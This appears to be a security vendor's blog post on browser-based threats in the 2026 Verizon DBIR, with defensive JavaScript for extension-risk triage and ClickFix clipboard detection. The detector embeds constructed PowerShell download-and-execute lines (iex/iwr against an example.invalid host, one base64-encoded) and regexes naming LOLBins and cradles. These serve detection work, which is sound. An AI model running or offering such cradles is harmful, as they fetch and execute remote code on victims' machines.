2026 DBIR: Browser-Based Attacks

June 5, 2026 16:03 · 12 min read
Introduction to the 2026 DBIR

The Verizon Data Breach Investigations Report (DBIR) is a yearly benchmark for the industry, providing insight into the latest trends and threats in cybersecurity. This year's report, to which Keep Aware contributed data, highlights the growing weight of browser-based attacks. As a contributor to the 2026 DBIR, the Keep Aware team saw early how several independent data sources converge on the same conclusion: attackers have shifted a large share of their activity into the browser.

Shadow AI: A Mainstream Enterprise Risk

The 2026 DBIR identifies Shadow AI as the third most common non-malicious insider action observed in Data Loss Prevention (DLP) datasets, a fourfold increase from the previous year. Employees are using personal AI services, such as ChatGPT, for work tasks, which moves company data into accounts the organization neither controls nor monitors. Keep Aware's browser telemetry shows that over half of AI prompt inputs are sent to personal accounts, and that 23% of sensitive prompt uploads involve data transiting through personal or unverified accounts.

Credential Abuse and the Browser's Detection Gap

The 2026 DBIR found that 39% of breaches involved credential abuse, while Keep Aware's 2025 attack data ranks credential theft as the most common browser-based attack, at roughly 41% of observed threat activity. Most of these attacks are invisible to traditional tooling: 63% of Microsoft-themed phishing sites were not flagged by any VirusTotal vendor at the time employees were exposed to them.

Browser Extensions: Privileged, Ungoverned, and Expanding

The 2026 DBIR flagged that the average enterprise had unauthorized AI extensions installed for more than 15% of its users. The extension problem is broader than AI tooling alone: 13% of unique browser extensions observed across Keep Aware's customer base are classified as high or critical risk. Poor-reputation extensions are routinely listed as "productivity" tools by browser marketplaces, and the marketplace category says nothing about the permissions an extension requests or the reputation of its publisher, so category-based allowlisting is functionally useless.
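The practical alternative to category-based allowlisting is to triage extensions by what they can actually do, which is visible in their manifest. The following is an added example (not code from the article or from Keep Aware) that scores a Chrome extension manifest by its requested permissions, host permissions, and content-script match patterns; the weights, thresholds, extension names, and store categories are assumptions chosen to illustrate the point, not a vendor scoring model. Both sample manifests are constructed and both would be listed under "Productivity".

```javascript
// Added example: permission-based risk triage for Chrome extension manifests.
// Weights and thresholds are assumptions for illustration only.
const PERMISSION_WEIGHTS = {
  '<all_urls>': 4, debugger: 4,
  webRequest: 3, webRequestBlocking: 3, cookies: 3, scripting: 3, nativeMessaging: 3,
  declarativeNetRequest: 2, tabs: 2, clipboardRead: 2, history: 2, downloads: 2, management: 2,
  clipboardWrite: 1, webNavigation: 1,
  storage: 0, alarms: 0, contextMenus: 0, activeTab: 0,
};

// Unknown permissions are not free: weight 1 so they still surface in findings.
function weightOf(permission) {
  return Object.prototype.hasOwnProperty.call(PERMISSION_WEIGHTS, permission)
    ? PERMISSION_WEIGHTS[permission]
    : 1;
}

// Host match patterns: access to every site is far more dangerous than one host.
function hostWeight(pattern) {
  if (pattern === '<all_urls>' || /^\*:\/\/\*\/\*?$/.test(pattern)) return 4;
  if (/^https?:\/\/\*\/\*?$/.test(pattern)) return 3; // every host on one scheme
  if (pattern.startsWith('file://')) return 2;
  return 1; // a specific host
}

function assessManifest(manifest) {
  const findings = [];
  let score = 0;
  for (const p of manifest.permissions || []) {
    const w = weightOf(p);
    if (w > 0) { score += w; findings.push(`permission ${p} (+${w})`); }
  }
  for (const h of manifest.host_permissions || []) {
    const w = hostWeight(h);
    score += w;
    findings.push(`host ${h} (+${w})`);
  }
  // A content script injected into every page can read and alter anything the user sees.
  for (const cs of manifest.content_scripts || []) {
    for (const match of cs.matches || []) {
      if (hostWeight(match) >= 3) { score += 3; findings.push(`content script on ${match} (+3)`); }
    }
  }
  const rating = score >= 10 ? 'critical' : score >= 6 ? 'high' : score >= 3 ? 'medium' : 'low';
  return { name: manifest.name, score, rating, findings };
}

// Constructed sample listings: the store category is identical, the risk is not.
const SAMPLE_EXTENSIONS = [
  {
    storeCategory: 'Productivity',
    manifest: {
      name: 'Tab Tidy Pro', manifest_version: 3,
      permissions: ['tabs', 'scripting', 'cookies', 'webRequest', 'storage'],
      host_permissions: ['<all_urls>'],
      content_scripts: [{ matches: ['<all_urls>'], js: ['inject.js'] }],
    },
  },
  {
    storeCategory: 'Productivity',
    manifest: {
      name: 'Quick Notes', manifest_version: 3,
      permissions: ['storage', 'activeTab'],
    },
  },
];

function triageExtensions(listings) {
  return listings.map(({ storeCategory, manifest }) => ({ storeCategory, ...assessManifest(manifest) }));
}

console.log(JSON.stringify(triageExtensions(SAMPLE_EXTENSIONS), null, 2));
```

In the constructed listings, "Tab Tidy Pro" scores as critical on permissions alone (every site, cookies, request interception, script injection) while "Quick Notes" scores as low, even though a category-based allowlist would treat them identically.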

ClickFix and Browser-Native Social Engineering

Both the 2026 DBIR and Keep Aware's State of Browser Security Report call out ClickFix as an emerging technique worth tracking. ClickFix is a social engineering technique in which a web page, often posing as a CAPTCHA check or a "fix this error" prompt, copies a command to the user's clipboard and instructs them to paste it into the Windows Run dialog, a terminal, or PowerShell, so that the user unknowingly runs the attacker's code on their own machine. The lure is delivered in the browser, but the compromise completes on the endpoint, typically with an info-stealer or a tool that gives the attacker remote access.
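Because the payload passes through the clipboard before it ever reaches the endpoint, the browser layer is where a ClickFix command can be inspected first. The following is an added example (not code from the article or from Keep Aware) of the heuristic a browser-side control might apply to text an untrusted page writes to the clipboard: it looks for a PowerShell or LOLBin launcher, a hidden-window switch, a download cradle, inline execution, an encoded command, and the decoy "verification" comment that ClickFix lures append so the pasted line looks harmless. It also decodes a PowerShell `-EncodedCommand` argument (base64 over UTF-16LE) and rescans the plaintext, since that is how the obvious keywords are hidden. The indicator list, the two-indicator threshold, and all sample payloads are constructed assumptions for illustration; the URLs use the reserved `.invalid` domain.

```javascript
// Added example: heuristic detector for ClickFix-style clipboard payloads.
// Indicators and the threshold are assumptions, not a vendor's rules.
const INDICATORS = [
  { name: 'powershell-launcher', re: /\b(powershell(\.exe)?|pwsh)\b/i },
  { name: 'lolbin', re: /\b(mshta|rundll32|regsvr32|certutil|bitsadmin|wscript|cscript)(\.exe)?\b/i },
  { name: 'hidden-window', re: /-(w|win|windowstyle)\s+hidden\b/i },
  { name: 'download-cradle', re: /\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile|curl|wget)\b/i },
  { name: 'inline-exec', re: /\b(iex|invoke-expression)\b|\|\s*(sh|bash)\b/i },
  { name: 'encoded-command', re: /-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}/i },
  // ClickFix lures append a comment so the Run dialog shows "verification" text.
  { name: 'decoy-comment', re: /#\s*.*\b(not a robot|verification|captcha)\b/i },
];

// PowerShell -EncodedCommand takes base64 of the UTF-16LE script text.
function decodeEncodedCommand(text) {
  const m = /-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})/i.exec(text);
  if (!m) return null;
  return Buffer.from(m[1], 'base64').toString('utf16le');
}

// Helper used only to build the constructed encoded sample below.
function toEncodedCommand(script) {
  return Buffer.from(script, 'utf16le').toString('base64');
}

function analyzeClipboardText(text) {
  const found = new Set();
  const scan = (s) => {
    for (const ind of INDICATORS) if (ind.re.test(s)) found.add(ind.name);
  };
  scan(text);
  // Rescan the decoded script so -enc does not hide the cradle and iex.
  const decoded = decodeEncodedCommand(text);
  if (decoded) scan(decoded);
  const indicators = [...found].sort();
  // One indicator alone (e.g. "brew install wget") is normal; two or more is not.
  return { suspicious: indicators.length >= 2, indicators, decoded };
}

// Constructed sample clipboard contents (not captured from a real lure).
const SAMPLES = {
  clickfixPlain:
    `powershell -w hidden -c "iex (iwr 'https://example.invalid/v.txt')" # "I am not a robot - reCAPTCHA Verification ID: 7921"`,
  clickfixEncoded:
    `powershell -nop -enc ${toEncodedCommand("iex (irm 'https://example.invalid/a')")}`,
  benignClone: 'git clone https://github.com/example/repo.git',
  benignInstall: 'brew install wget',
};

function scanAll() {
  return Object.fromEntries(
    Object.entries(SAMPLES).map(([name, text]) => [name, analyzeClipboardText(text)]),
  );
}

console.log(JSON.stringify(scanAll(), null, 2));
```

Run under Node.js. The plain lure trips five indicators and the encoded one four (two only after decoding), while the two benign commands trip at most one and are not flagged; in a real deployment the same check would run on the text a page passes to the clipboard API rather than on hard-coded strings.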

The Human Element Continues to be a (Browser) Problem

The 2026 DBIR found that 62% of breaches involved the human element, with phishing initiating 16% of incidents. Keep Aware's browser-layer data shows that phishing and social engineering accounted for 46% of the browser attacks observed across 2025. Because attackers keep adapting these lures to the browser, where the user actually encounters them, detecting them reliably requires visibility at the browser level.

Conclusion and Recommendations

Shadow AI, credential theft, malicious extensions, and browser-native social engineering techniques like ClickFix all execute inside the browser, producing artifacts that are most visible at the browser layer. Security programs that rely exclusively on network, endpoint, and identity telemetry will continue to have blind spots in exactly the places attackers have learned to operate. Securing the browser is no longer optional, and security teams should consider implementing browser-level visibility to detect and prevent these threats.

Request a demo of Keep Aware to see what your current tools are missing. Keep Aware contributed data to the Verizon 2026 Data Breach Investigations Report, and their 2026 State of Browser Security Report is available for further reading.


Source: BleepingComputer
